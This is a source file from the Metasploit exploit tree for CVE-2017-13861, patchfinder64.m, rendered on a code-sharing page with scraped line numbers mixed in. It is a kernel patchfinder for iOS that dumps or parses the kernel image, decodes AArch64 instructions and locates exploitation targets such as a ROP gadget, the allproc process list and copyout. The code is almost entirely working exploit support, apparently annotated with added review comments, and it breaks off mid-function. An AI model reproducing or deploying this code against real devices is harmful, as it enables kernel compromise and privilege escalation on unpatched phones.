CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/patchfinder64.m
Views: 11780
1
2
//
3
// patchfinder64.c
4
// extra_recipe
5
//
6
// Created by xerub on 06/06/2017.
7
// Copyright © 2017 xerub. All rights reserved.
8
//
9
10
#import <assert.h>
11
#import <stdint.h>
12
#import <string.h>
13
#import "kernel_utils.h"
14
15
/* 64-bit kernel virtual address / buffer offset used throughout the finder. */
typedef unsigned long long addr_t;

/* Low bit of the first magic byte distinguishes MH_MAGIC_64 (0xfeedfacf)
 * from MH_MAGIC (0xfeedface) on a little-endian image. */
#define IS64(image) (*(uint8_t *)(image) & 1)

/* True for either Mach-O magic (the ~1 folds 0xfeedfacf onto 0xfeedface). */
#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)

/* generic stuff *************************************************************/

/* Normally supplied by <limits.h>; defined here so this file stands alone. */
#define UCHAR_MAX 255
24
25
/*
 * Boyer-Moore-Horspool byte search: locate needle[0..nlen) inside
 * haystack[0..hlen).  Returns a pointer to the first match, or NULL when
 * nlen is zero, either pointer is NULL, or there is no occurrence.
 */
static unsigned char *
Boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,
                           const unsigned char* needle, size_t nlen)
{
    size_t skip[256]; /* bad-character shift table, one entry per byte value */
    size_t pos;

    /* Reject degenerate inputs up front. */
    if (nlen == 0 || haystack == NULL || needle == NULL) {
        return NULL;
    }

    /* A byte that never occurs in the needle allows a full-length jump. */
    for (pos = 0; pos < 256; pos++) {
        skip[pos] = nlen;
    }

    const size_t tail = nlen - 1; /* index of the needle's last byte */

    /* Bytes that do occur shift by their distance to the needle's end
     * (the final byte itself is deliberately excluded). */
    for (pos = 0; pos < tail; pos++) {
        skip[needle[pos]] = tail - pos;
    }

    /* Slide the window while it still fits inside the haystack. */
    while (hlen >= nlen) {
        /* Compare right-to-left; reaching index 0 means a full match. */
        for (pos = tail; haystack[pos] == needle[pos]; pos--) {
            if (pos == 0) {
                return (void *)haystack;
            }
        }
        /* Advance by the shift of the byte under the window's last slot. */
        hlen -= skip[haystack[tail]];
        haystack += skip[haystack[tail]];
    }

    return NULL;
}
79
80
/* disassembler **************************************************************/
81
82
/* 0-based index of the most significant set bit among the low N bits of
 * imm, or -1 when none of those bits are set. */
static int HighestSetBit(int N, uint32_t imm)
{
    int bit = N;
    while (bit-- > 0) {
        if (imm & (1 << bit)) {
            return bit;
        }
    }
    return -1;
}
92
93
/* Build a mask of M consecutive one-bits in the low positions — ARM
 * pseudocode ZeroExtend(Ones(M), N).  N only mirrors the spec signature.
 * BUGFIX: shifting a 64-bit value by 64 is undefined behavior in C
 * (C11 6.5.7), so M >= 64 now returns the all-ones mask explicitly. */
static uint64_t ZeroExtendOnes(unsigned M, unsigned N) // zero extend M ones to N width
{
    (void)N;
    if (M >= 64) {
        return ~(uint64_t)0;
    }
    return ((uint64_t)1 << M) - 1;
}
98
99
/* Rotate the M-ones mask right by R inside an N-bit field — ARM pseudocode
 * ROR(ZeroExtend(Ones(M), N), R). */
static uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R)
{
    uint64_t ones = ZeroExtendOnes(M, N);
    if (R == 0) {
        return ones;
    }
    uint64_t keep_mask = ((uint64_t)1 << (N - R)) - 1; /* bits that shift down */
    uint64_t wrap_mask = ((uint64_t)1 << R) - 1;       /* bits that wrap to the top */
    uint64_t shifted = (ones >> R) & keep_mask;
    uint64_t wrapped = (ones & wrap_mask) << (N - R);
    return shifted | wrapped;
}
107
108
/* Tile a `bits`-wide pattern across the whole 64-bit word — ARM pseudocode
 * Replicate.  `bits` is expected to divide 64 evenly. */
static uint64_t Replicate(uint64_t val, unsigned bits)
{
    uint64_t tiled = val;
    unsigned pos = bits; // XXX actually, it is either 32 or 64
    while (pos < 64) {
        tiled |= val << pos;
        pos += bits;
    }
    return tiled;
}
117
118
/*
 * Decode an AArch64 logical-immediate (immN:immr:imms) into its 64-bit
 * value — a transcription of ARM pseudocode DecodeBitMasks().
 * Returns 0 and stores the value in *newval, or -1 for a reserved
 * encoding.  `immediate` enables the extra reserved-pattern check used
 * for logical-immediate instructions.
 */
static int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval)
{
    unsigned levels, S, R, esize;
    /* len selects the element size: highest set bit of immN:NOT(imms). */
    int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F));
    if (len < 1) {
        return -1;
    }
    levels = ZeroExtendOnes(len, 6);
    /* All-ones imms within the element is reserved for immediates. */
    if (immediate && (imms & levels) == levels) {
        return -1;
    }
    S = imms & levels;  /* number of ones minus one */
    R = immr & levels;  /* rotate amount */
    esize = 1 << len;   /* element size in bits */
    /* Rotate S+1 ones inside one element, then tile it across 64 bits. */
    *newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize);
    return 0;
}
135
136
/*
 * Decode one AArch64 instruction that can take part in materializing an
 * immediate in a register: ORR-immediate (the MOV bitmask alias),
 * MOVN/MOVZ/MOVK, and ADD/SUB-immediate with Rd == Rn.
 *
 * `total` is the value accumulated so far for the register (used by MOVK
 * and ADD/SUB); `first` marks the first instruction of a sequence, in
 * which case only value-creating forms (MOVN/MOVZ/ORR) are accepted.
 * Returns 0 and stores the new value in *newval, or -1 when the opcode
 * is not one of the supported forms.
 */
static int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval)
{
    unsigned o = (opcode >> 29) & 3;    /* opc field */
    unsigned k = (opcode >> 23) & 0x3F; /* instruction-class bits */
    unsigned rn, rd;
    uint64_t i;

    if (k == 0x24 && o == 1) { // MOV (bitmask imm) <=> ORR (immediate)
        unsigned s = (opcode >> 31) & 1; /* sf: 1 = 64-bit */
        unsigned N = (opcode >> 22) & 1;
        if (s == 0 && N != 0) {
            /* N must be 0 in the 32-bit variant. */
            return -1;
        }
        rn = (opcode >> 5) & 0x1F;
        if (rn == 31) {
            /* Only the XZR-source form is a plain MOV. */
            unsigned imms = (opcode >> 10) & 0x3F;
            unsigned immr = (opcode >> 16) & 0x3F;
            return DecodeBitMasks(N, imms, immr, 1, newval);
        }
    } else if (k == 0x25) { // MOVN/MOVZ/MOVK
        unsigned s = (opcode >> 31) & 1;
        unsigned h = (opcode >> 21) & 3; /* hw: 16-bit chunk selector */
        if (s == 0 && h > 1) {
            /* 32-bit form only allows shifts of 0 or 16. */
            return -1;
        }
        i = (opcode >> 5) & 0xFFFF; /* imm16 */
        h *= 16;
        i <<= h; /* place the chunk at its hw slot */
        if (o == 0) { // MOVN
            *newval = ~i;
            return 0;
        } else if (o == 2) { // MOVZ
            *newval = i;
            return 0;
        } else if (o == 3 && !first) { // MOVK
            /* Keep `total` but replace the selected 16-bit chunk. */
            *newval = (total & ~((uint64_t)0xFFFF << h)) | i;
            return 0;
        }
    } else if ((k | 1) == 0x23 && !first) { // ADD (immediate)
        unsigned h = (opcode >> 22) & 3; /* shift field: 0 or 1 (LSL #12) */
        if (h > 1) {
            return -1;
        }
        rd = opcode & 0x1F;
        rn = (opcode >> 5) & 0x1F;
        if (rd != rn) {
            /* Only in-place adjustments of the tracked register. */
            return -1;
        }
        i = (opcode >> 10) & 0xFFF; /* imm12 */
        h *= 12;
        i <<= h;
        if (o & 2) { // SUB
            *newval = total - i;
            return 0;
        } else { // ADD
            *newval = total + i;
            return 0;
        }
    }

    return -1;
}
198
199
/* patchfinder ***************************************************************/
200
201
/* Scan forward from buf+start over at most `length` bytes, 4 at a time,
 * for an instruction with (insn & mask) == what.  Returns the matching
 * offset, or 0 when nothing matched within the range. */
static addr_t
Step64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
{
    const addr_t limit = start + length;
    addr_t off;
    for (off = start; off < limit; off += 4) {
        uint32_t insn = *(uint32_t *)(buf + off);
        if ((insn & mask) == what) {
            return off;
        }
    }
    return 0;
}
214
215
// str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);
/* Scan backward from buf+start over at most `length` bytes, 4 at a time,
 * for an instruction with (insn & mask) == what.  Returns the matching
 * offset, or 0 when nothing matched.
 * NOTE(review): assumes start >= length; addr_t is unsigned, so
 * `start - length` wraps otherwise — confirm callers guarantee this. */
static addr_t
Step64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
{
    const addr_t lowest = start - length;
    addr_t off;
    for (off = start; off >= lowest; off -= 4) {
        uint32_t insn = *(uint32_t *)(buf + off);
        if ((insn & mask) == what) {
            return off;
        }
    }
    return 0;
}
229
230
// Finds start of function
/* Walk backward from `where` (but not below `start`) looking for a typical
 * AArch64 prologue: an "ADD X29, SP, #imm" whose matching
 * "STP x, y, [SP,#-imm]!" sits (imm/16 + 1) instructions earlier.
 * Returns the offset of that STP, or 0 when no prologue is found. */
static addr_t
BOF64(const uint8_t *buf, addr_t start, addr_t where)
{
    for (; where >= start; where -= 4) {
        uint32_t op = *(uint32_t *)(buf + where);
        if ((op & 0xFFC003FF) == 0x910003FD) {
            /* ADD X29, SP, #delta */
            unsigned delta = (op >> 10) & 0xFFF;
            if ((delta & 0xF) == 0) {
                /* Candidate frame setup; the STP should sit just above the
                 * callee-saved area.  NOTE(review): `prev` is not clamped to
                 * `start`, matching the original behavior — confirm callers
                 * pass `where` well inside the buffer. */
                addr_t prev = where - ((delta >> 4) + 1) * 4;
                uint32_t au = *(uint32_t *)(buf + prev);
                if ((au & 0xFFC003E0) == 0xA98003E0) {
                    /* STP x, y, [SP,#-imm]! */
                    return prev;
                }
            }
        }
        if (where < start + 4) {
            /* BUGFIX: addr_t is unsigned, so with start == 0 the original
             * `where -= 4` wrapped past zero and kept scanning out of
             * bounds forever.  Stop once the lower bound was inspected. */
            break;
        }
    }
    return 0;
}
251
252
/*
 * Find the first instruction in [start, end) whose tracked register value
 * becomes `what` — i.e. the first code reference to that (dump-relative)
 * address.  A tiny forward "emulation" tracks one 64-bit value per
 * register for ADRP, ADD-immediate, LDR (unsigned offset), ADR and
 * LDR-literal; everything else leaves the register state untouched.
 * Returns the offset of the referencing instruction, or 0 if none.
 */
static addr_t
xref64(const uint8_t *buf, addr_t start, addr_t end, addr_t what)
{
    addr_t i;
    uint64_t value[32]; /* one slot per GPR; index 31 is SP/XZR, tracked naively */

    memset(value, 0, sizeof(value));

    end &= ~3; /* force 4-byte alignment */
    for (i = start & ~3; i < end; i += 4) {
        uint32_t op = *(uint32_t *)(buf + i);
        unsigned reg = op & 0x1F; /* destination register */
        if ((op & 0x9F000000) == 0x90000000) {
            /* ADRP: rebuild the +/- page displacement from immlo:immhi. */
            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
            value[reg] = ((long long)adr << 1) + (i & ~0xFFF);
            /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {
            unsigned rd = op & 0x1F;
            unsigned rm = (op >> 16) & 0x1F;
            // MOV Xd, Xm
            value[rd] = value[rm];*/
        } else if ((op & 0xFF000000) == 0x91000000) {
            /* ADD Xd, Xn, #imm{, LSL #12} */
            unsigned rn = (op >> 5) & 0x1F;
            unsigned shift = (op >> 22) & 3;
            unsigned imm = (op >> 10) & 0xFFF;
            if (shift == 1) {
                imm <<= 12;
            } else {
                //assert(shift == 0);
                if (shift > 1) continue; /* reserved encoding; skip */
            }
            value[reg] = value[rn] + imm;
        } else if ((op & 0xF9C00000) == 0xF9400000) {
            /* LDR Xd, [Xn, #imm] — track the loaded-from address. */
            unsigned rn = (op >> 5) & 0x1F;
            unsigned imm = ((op >> 10) & 0xFFF) << 3;
            if (!imm) continue; // XXX not counted as true xref
            value[reg] = value[rn] + imm; // XXX address, not actual value
            /*} else if ((op & 0xF9C00000) == 0xF9000000) {
            unsigned rn = (op >> 5) & 0x1F;
            unsigned imm = ((op >> 10) & 0xFFF) << 3;
            // STR Xd, [Xn, #imm]
            if (!imm) continue; // XXX not counted as true xref
            value[rn] = value[rn] + imm; // XXX address, not actual value*/
        } else if ((op & 0x9F000000) == 0x10000000) {
            /* ADR: PC-relative byte displacement. */
            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
            value[reg] = ((long long)adr >> 11) + i;
        } else if ((op & 0xFF000000) == 0x58000000) {
            /* LDR (literal) — track the literal pool address. */
            unsigned adr = (op & 0xFFFFE0) >> 3;
            value[reg] = adr + i; // XXX address, not actual value
        }
        if (value[reg] == what) {
            return i;
        }
    }
    return 0;
}
312
313
/*
 * Forward-emulate [start, end) with the same per-register tracking as
 * xref64 (ADRP / ADD / LDR / STR / ADR / LDR-literal) and return the value
 * accumulated in register `which` when `end` is reached.  Used to recover
 * the address a register points at right before a known instruction.
 */
static addr_t
Calc64(const uint8_t *buf, addr_t start, addr_t end, int which)
{
    addr_t i;
    uint64_t value[32]; /* one tracked 64-bit value per GPR */

    memset(value, 0, sizeof(value));

    end &= ~3; /* force 4-byte alignment */
    for (i = start & ~3; i < end; i += 4) {
        uint32_t op = *(uint32_t *)(buf + i);
        unsigned reg = op & 0x1F; /* destination register */
        if ((op & 0x9F000000) == 0x90000000) {
            /* ADRP: rebuild the +/- page displacement from immlo:immhi. */
            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
            value[reg] = ((long long)adr << 1) + (i & ~0xFFF);
            /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {
            unsigned rd = op & 0x1F;
            unsigned rm = (op >> 16) & 0x1F;
            // MOV Xd, Xm
            value[rd] = value[rm];*/
        } else if ((op & 0xFF000000) == 0x91000000) {
            /* ADD Xd, Xn, #imm{, LSL #12} */
            unsigned rn = (op >> 5) & 0x1F;
            unsigned shift = (op >> 22) & 3;
            unsigned imm = (op >> 10) & 0xFFF;
            if (shift == 1) {
                imm <<= 12;
            } else {
                //assert(shift == 0);
                if (shift > 1) continue; /* reserved encoding; skip */
            }
            value[reg] = value[rn] + imm;
        } else if ((op & 0xF9C00000) == 0xF9400000) {
            /* LDR Xd, [Xn, #imm] — track the loaded-from address. */
            unsigned rn = (op >> 5) & 0x1F;
            unsigned imm = ((op >> 10) & 0xFFF) << 3;
            if (!imm) continue; // XXX not counted as true xref
            value[reg] = value[rn] + imm; // XXX address, not actual value
        } else if ((op & 0xF9C00000) == 0xF9000000) {
            /* STR Xd, [Xn, #imm] — note it updates the BASE register slot. */
            unsigned rn = (op >> 5) & 0x1F;
            unsigned imm = ((op >> 10) & 0xFFF) << 3;
            if (!imm) continue; // XXX not counted as true xref
            value[rn] = value[rn] + imm; // XXX address, not actual value
        } else if ((op & 0x9F000000) == 0x10000000) {
            /* ADR: PC-relative byte displacement. */
            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
            value[reg] = ((long long)adr >> 11) + i;
        } else if ((op & 0xFF000000) == 0x58000000) {
            /* LDR (literal) — track the literal pool address. */
            unsigned adr = (op & 0xFFFFE0) >> 3;
            value[reg] = adr + i; // XXX address, not actual value
        }
    }
    return value[which];
}
370
371
/*
 * Forward-emulate [start, end) tracking only immediate-building
 * instructions (via DecodeMov: MOVN/MOVZ/MOVK, ORR-imm, ADD/SUB-imm) and
 * return the value accumulated in register `which`.  32-bit forms
 * (sf == 0) have their result truncated to 32 bits, as on hardware.
 */
static addr_t
Calc64mov(const uint8_t *buf, addr_t start, addr_t end, int which)
{
    addr_t i;
    uint64_t value[32]; /* one tracked value per GPR */

    memset(value, 0, sizeof(value));

    end &= ~3; /* force 4-byte alignment */
    for (i = start & ~3; i < end; i += 4) {
        uint32_t op = *(uint32_t *)(buf + i);
        unsigned reg = op & 0x1F; /* destination register */
        uint64_t newval;
        /* first=0: accept MOVK/ADD/SUB continuing an earlier value too. */
        int rv = DecodeMov(op, value[reg], 0, &newval);
        if (rv == 0) {
            if (((op >> 31) & 1) == 0) {
                /* sf == 0: 32-bit operation zeroes the upper half. */
                newval &= 0xFFFFFFFF;
            }
            value[reg] = newval;
        }
    }
    return value[which];
}
394
395
/* Offset of the first BL (branch-with-link) at/after `start` within
 * `length` bytes, or 0 when there is none. */
static addr_t
Find_call64(const uint8_t *buf, addr_t start, size_t length)
{
    const uint32_t bl_value = 0x94000000; /* BL */
    const uint32_t bl_mask = 0xFC000000;  /* top 6 opcode bits */
    return Step64(buf, start, length, bl_value, bl_mask);
}
400
401
/* Resolve the target of the BL/B at buf+call: sign-extend the 26-bit
 * immediate and scale it by 4.
 * BUGFIX: the original sign-extended with `w <<= 64 - 26`, which shifts a
 * set bit into the sign position of a signed long long — undefined
 * behavior (C11 6.5.7p4).  Extend arithmetically instead. */
static addr_t
Follow_call64(const uint8_t *buf, addr_t call)
{
    long long imm = *(uint32_t *)(buf + call) & 0x3FFFFFF; /* imm26 */
    if (imm & 0x2000000) {
        imm -= 0x4000000; /* sign-extend from bit 25 */
    }
    return call + (addr_t)(imm * 4);
}
410
411
/* Resolve the target of the compare-and-branch at buf+cbz: sign-extend
 * the 19-bit immediate (bits 23:5) and scale it by 4.
 * BUGFIX: the original `(x & 0x3FFFFE0) << 10 >> 13` left-shifts bits out
 * of a 32-bit int (undefined behavior) and effectively sign-extends from
 * the wrong bit for large displacements. */
static addr_t
Follow_cbz(const uint8_t *buf, addr_t cbz)
{
    long long imm = (*(uint32_t *)(buf + cbz) >> 5) & 0x7FFFF; /* imm19 */
    if (imm & 0x40000) {
        imm -= 0x80000; /* sign-extend from bit 18 */
    }
    return cbz + (addr_t)(imm * 4);
}
416
417
/* kernel iOS10 **************************************************************/
418
419
#import <fcntl.h>
420
#import <stdio.h>
421
#import <stdlib.h>
422
#import <unistd.h>
423
#import <mach-o/loader.h>
424
425
//#define __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
426
427
#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
428
#import <mach/mach.h>
429
size_t KernelRead(uint64_t where, void *p, size_t size);
430
#endif
431
432
/* Flat in-memory copy of the kernel image plus the layout facts
 * InitPatchfinder() extracts from its Mach-O headers.  All *_Base/*_base
 * values are rebased to be relative to KernDumpBase after parsing. */
static uint8_t *Kernel = NULL;     /* allocated copy of the kernel image */
static size_t Kernel_size = 0;     /* max segment end - min segment start */

static addr_t XNUCore_Base = 0;    /* __TEXT_EXEC vmaddr (dump-relative) */
static addr_t XNUCore_Size = 0;    /* __TEXT_EXEC filesize */
static addr_t Prelink_Base = 0;    /* __PLK_TEXT_EXEC vmaddr (dump-relative) */
static addr_t Prelink_Size = 0;    /* __PLK_TEXT_EXEC filesize */
static addr_t CString_base = 0;    /* __TEXT,__cstring addr (dump-relative) */
static addr_t CString_size = 0;    /* __TEXT,__cstring size */
static addr_t PString_base = 0;    /* __PRELINK_TEXT,__text addr (dump-relative) */
static addr_t PString_size = 0;    /* __PRELINK_TEXT,__text size */
static addr_t KernDumpBase = -1;   /* lowest segment vmaddr; -1 = sentinel */
static addr_t Kernel_entry = 0;    /* pc from LC_UNIXTHREAD, if present */
static void *Kernel_mh = 0;        /* mach header location inside Kernel */
static addr_t Kernel_delta = 0;    /* __LINKEDIT vmaddr - min - fileoff */
447
448
/*
 * Parse the kernel Mach-O and populate the module globals above.
 *
 * On-device (__ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__): read the
 * header via KernelRead() from `base` and then dump the whole in-memory
 * kernel.  Off-device: read the header and segments from `filename`.
 * Returns 0 on success, -1 on any failure (with fd/Kernel cleaned up).
 *
 * NOTE(review): assumes all load commands fit in the first 0x4000 bytes
 * of the image — confirm for the target kernels.
 */
int
InitPatchfinder(addr_t base, const char *filename)
{
    size_t rv;
    uint8_t buf[0x4000]; /* header + load commands scratch buffer */
    unsigned i, j;
    const struct mach_header *hdr = (struct mach_header *)buf;
    const uint8_t *q;
    addr_t min = -1; /* all-ones sentinel: any real vmaddr is smaller */
    addr_t max = 0;
    int is64 = 0;

#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
#define close(f)
    /* Kernel memory path: pull the header from the running kernel. */
    rv = KernelRead(base, buf, sizeof(buf));
    if (rv != sizeof(buf)) {
        return -1;
    }
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    /* File path: read the header from a decrypted kernelcache on disk. */
    int fd = open(filename, O_RDONLY);
    if (fd < 0) {
        return -1;
    }

    rv = read(fd, buf, sizeof(buf));
    if (rv != sizeof(buf)) {
        close(fd);
        return -1;
    }
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */

    if (!MACHO(buf)) {
        close(fd);
        return -1;
    }

    /* A 64-bit mach_header_64 carries 4 extra bytes of `reserved`. */
    if (IS64(buf)) {
        is64 = 4;
    }

    /* First pass over the load commands: record segment layout. */
    q = buf + sizeof(struct mach_header) + is64;
    for (i = 0; i < hdr->ncmds; i++) {
        const struct load_command *cmd = (struct load_command *)q;
        if (cmd->cmd == LC_SEGMENT_64) {
            const struct segment_command_64 *seg = (struct segment_command_64 *)q;
            if (min > seg->vmaddr) {
                min = seg->vmaddr;
            }
            if (max < seg->vmaddr + seg->vmsize) {
                max = seg->vmaddr + seg->vmsize;
            }
            if (!strcmp(seg->segname, "__TEXT_EXEC")) {
                /* Core kernel executable code. */
                XNUCore_Base = seg->vmaddr;
                XNUCore_Size = seg->filesize;
            }
            if (!strcmp(seg->segname, "__PLK_TEXT_EXEC")) {
                /* Prelinked kext executable code. */
                Prelink_Base = seg->vmaddr;
                Prelink_Size = seg->filesize;
            }
            if (!strcmp(seg->segname, "__TEXT")) {
                /* Locate the C-string pool used by Find_strref(). */
                const struct section_64 *sec = (struct section_64 *)(seg + 1);
                for (j = 0; j < seg->nsects; j++) {
                    if (!strcmp(sec[j].sectname, "__cstring")) {
                        CString_base = sec[j].addr;
                        CString_size = sec[j].size;
                    }
                }
            }
            if (!strcmp(seg->segname, "__PRELINK_TEXT")) {
                /* Prelink text section doubles as the kext string pool. */
                const struct section_64 *sec = (struct section_64 *)(seg + 1);
                for (j = 0; j < seg->nsects; j++) {
                    if (!strcmp(sec[j].sectname, "__text")) {
                        PString_base = sec[j].addr;
                        PString_size = sec[j].size;
                    }
                }
            }
            if (!strcmp(seg->segname, "__LINKEDIT")) {
                Kernel_delta = seg->vmaddr - min - seg->fileoff;
            }
        }
        if (cmd->cmd == LC_UNIXTHREAD) {
            uint32_t *ptr = (uint32_t *)(cmd + 1);
            uint32_t flavor = ptr[0];
            /* Layout mirrors the ARM64 thread state in the load command. */
            struct {
                uint64_t x[29]; /* General purpose registers x0-x28 */
                uint64_t fp;    /* Frame pointer x29 */
                uint64_t lr;    /* Link register x30 */
                uint64_t sp;    /* Stack pointer x31 */
                uint64_t pc;    /* Program counter */
                uint32_t cpsr;  /* Current program status register */
            } *thread = (void *)(ptr + 2);
            /* flavor 6 — presumably ARM_THREAD_STATE64; confirm. */
            if (flavor == 6) {
                Kernel_entry = thread->pc;
            }
        }
        q = q + cmd->cmdsize;
    }

    /* Rebase everything so offsets index directly into Kernel[]. */
    KernDumpBase = min;
    XNUCore_Base -= KernDumpBase;
    Prelink_Base -= KernDumpBase;
    CString_base -= KernDumpBase;
    PString_base -= KernDumpBase;
    Kernel_size = max - min;

#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
    /* Dump the live kernel into a flat buffer. */
    Kernel = malloc(Kernel_size);
    if (!Kernel) {
        return -1;
    }
    rv = KernelRead(KernDumpBase, Kernel, Kernel_size);
    if (rv != Kernel_size) {
        free(Kernel);
        return -1;
    }

    Kernel_mh = Kernel + base - min;

    (void)filename;
#undef close
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    /* Second pass: map each segment's file contents at its vmaddr slot. */
    Kernel = calloc(1, Kernel_size);
    if (!Kernel) {
        close(fd);
        return -1;
    }

    q = buf + sizeof(struct mach_header) + is64;
    for (i = 0; i < hdr->ncmds; i++) {
        const struct load_command *cmd = (struct load_command *)q;
        if (cmd->cmd == LC_SEGMENT_64) {
            const struct segment_command_64 *seg = (struct segment_command_64 *)q;
            size_t sz = pread(fd, Kernel + seg->vmaddr - min, seg->filesize, seg->fileoff);
            if (sz != seg->filesize) {
                close(fd);
                free(Kernel);
                return -1;
            }
            if (!Kernel_mh) {
                /* First segment hosts the mach header. */
                Kernel_mh = Kernel + seg->vmaddr - min;
            }
            printf("%s\n", seg->segname);
            if (!strcmp(seg->segname, "__LINKEDIT")) {
                Kernel_delta = seg->vmaddr - min - seg->fileoff;
            }
        }
        q = q + cmd->cmdsize;
    }

    close(fd);

    (void)base;
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    return 0;
}
604
605
void
606
TermPatchfinder(void)
607
{
608
free(Kernel);
609
}
610
611
/* these operate on VA ******************************************************/

/* Each macro expands to an (opcode, mask) pair feeding the (what, mask)
 * parameters of Step64/Step64_back/Find_call64. */
#define INSN_RET 0xD65F03C0, 0xFFFFFFFF   /* RET (exact match) */
#define INSN_CALL 0x94000000, 0xFC000000  /* BL */
#define INSN_B 0x14000000, 0xFC000000     /* B */
#define INSN_CBZ 0x34000000, 0xFC000000   /* loose: CBZ/CBNZ/TBZ/TBNZ (W forms) */
#define INSN_ADRP 0x90000000, 0x9F000000  /* ADRP */

#define INSN_STR8 0xF9000000 | 8, 0xFFC00000 | 0x1F /* STR X8, [Xn,#imm] */
620
621
addr_t
622
Find_register_value(addr_t where, int reg)
623
{
624
addr_t val;
625
addr_t bof = 0;
626
where -= KernDumpBase;
627
if (where > XNUCore_Base) {
628
bof = BOF64(Kernel, XNUCore_Base, where);
629
if (!bof) {
630
bof = XNUCore_Base;
631
}
632
} else if (where > Prelink_Base) {
633
bof = BOF64(Kernel, Prelink_Base, where);
634
if (!bof) {
635
bof = Prelink_Base;
636
}
637
}
638
val = Calc64(Kernel, bof, where, reg);
639
if (!val) {
640
return 0;
641
}
642
return val + KernDumpBase;
643
}
644
645
addr_t
646
Find_reference(addr_t to, int n, int prelink)
647
{
648
addr_t ref, end;
649
addr_t base = XNUCore_Base;
650
addr_t size = XNUCore_Size;
651
if (prelink) {
652
base = Prelink_Base;
653
size = Prelink_Size;
654
}
655
if (n <= 0) {
656
n = 1;
657
}
658
end = base + size;
659
to -= KernDumpBase;
660
do {
661
ref = xref64(Kernel, base, end, to);
662
if (!ref) {
663
return 0;
664
}
665
base = ref + 4;
666
} while (--n > 0);
667
return ref + KernDumpBase;
668
}
669
670
addr_t
671
Find_strref(const char *string, int n, int prelink)
672
{
673
uint8_t *str;
674
addr_t base = CString_base;
675
addr_t size = CString_size;
676
if (prelink) {
677
base = PString_base;
678
size = PString_size;
679
}
680
str = Boyermoore_horspool_memmem(Kernel + base, size, (uint8_t *)string, strlen(string));
681
if (!str) {
682
return 0;
683
}
684
return Find_reference(str - Kernel + KernDumpBase, n, prelink);
685
}
686
687
/****** fun *******/
688
689
addr_t Find_add_x0_x0_0x40_ret(void) {
690
addr_t off;
691
uint32_t *k;
692
k = (uint32_t *)(Kernel + XNUCore_Base);
693
for (off = 0; off < XNUCore_Size - 4; off += 4, k++) {
694
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
695
return off + XNUCore_Base + KernDumpBase;
696
}
697
}
698
k = (uint32_t *)(Kernel + Prelink_Base);
699
for (off = 0; off < Prelink_Size - 4; off += 4, k++) {
700
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
701
return off + Prelink_Base + KernDumpBase;
702
}
703
}
704
return 0;
705
}
706
707
708
uint64_t Find_allproc_10(void)
709
{
710
addr_t val, bof, str8;
711
addr_t ref = Find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0);
712
if (!ref) {
713
return 0;
714
}
715
ref -= KernDumpBase;
716
bof = BOF64(Kernel, XNUCore_Base, ref);
717
if (!bof) {
718
return 0;
719
}
720
str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);
721
if (!str8) {
722
return 0;
723
}
724
val = Calc64(Kernel, bof, str8, 8);
725
if (!val) {
726
return 0;
727
}
728
return val + KernDumpBase;
729
}
730
731
uint64_t Find_allproc_11(void) {
732
// Find the first reference to the string
733
addr_t ref = Find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0);
734
if (!ref) {
735
return 0;
736
}
737
ref -= KernDumpBase;
738
739
uint64_t start = BOF64(Kernel, XNUCore_Base, ref);
740
if (!start) {
741
return 0;
742
}
743
744
// Find AND W8, W8, #0xFFFFDFFF - it's a pretty distinct instruction
745
addr_t weird_instruction = 0;
746
for (int i = 4; i < 4*0x100; i+=4) {
747
uint32_t op = *(uint32_t *)(Kernel + ref + i);
748
if (op == 0x12127908) {
749
weird_instruction = ref+i;
750
break;
751
}
752
}
753
if (!weird_instruction) {
754
return 0;
755
}
756
757
uint64_t val = Calc64(Kernel, start, weird_instruction - 8, 8);
758
if (!val) {
759
printf("Failed to calculate x8");
760
return 0;
761
}
762
763
return val + KernDumpBase;
764
}
765
766
767
/* Locate the kernel `allproc` list head: try the iOS 10 heuristic first,
 * then fall back to the iOS 11 one.  Returns 0 when both fail. */
uint64_t Find_allproc(void)
{
    uint64_t found = Find_allproc_10();
    return found ? found : Find_allproc_11();
}
775
776
uint64_t Find_copyout(void) {
777
// Find the first reference to the string
778
addr_t ref = Find_strref("\"%s(%p, %p, %lu) - transfer too large\"", 2, 0);
779
if (!ref) {
780
return 0;
781
}
782
ref -= KernDumpBase;
783
784
uint64_t start = 0;
785
for (int i = 4; i < 0x100*4; i+=4) {
786
